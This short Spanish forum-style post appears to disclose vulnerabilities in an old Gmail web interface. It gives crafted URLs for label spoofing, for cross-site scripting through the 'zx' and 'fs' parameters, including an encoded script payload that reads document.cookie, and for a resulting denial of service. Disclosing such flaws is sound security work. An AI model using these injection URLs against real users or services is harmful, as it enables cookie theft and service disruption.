Este mensaje es para usuarios con Cuenta Gmail.

Si un usuario tiene activa su cookie de Gmail podria ser vulnerable a este tipo de ataque en el cual podríamos llegar hasta denegar el sevicio.

Así, un usuario malintencionado podría crear una URL y:

1.-Modificar / Engañar al usuario con una etiqueta inexistente:
http://gmail.google.com/gmail?search=cat&cat=[label_name]&view=tl&start=0&zx=
y como vemos el boton "Remove Label" nos muestra el titulo incluido en [label_name].

2.-Cross-site scripting: la variable Zx no comprueba ni la longitud introducida ni si lo introducido es correcto permintiéndonos incluir codigo script para ser ejecutado.
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0
&zx=18acabd2b173f0d81040559556[XSS-code]&fs=1.

3.-Provocando una denegacion del servicio: Al permitir a la variable zx ejecucion de codigo, cualquier código que usemos hará que la variable fs se repita y repita y como resultado se obtendrá una denegación de servicio ya que el usuario no podrá ver la pagina de Gmail al estar "actualizando" cada vez:
http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl
&start=0&zx=18acabd2b173f0d81040559556
&fs=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&fs=1




Saludos.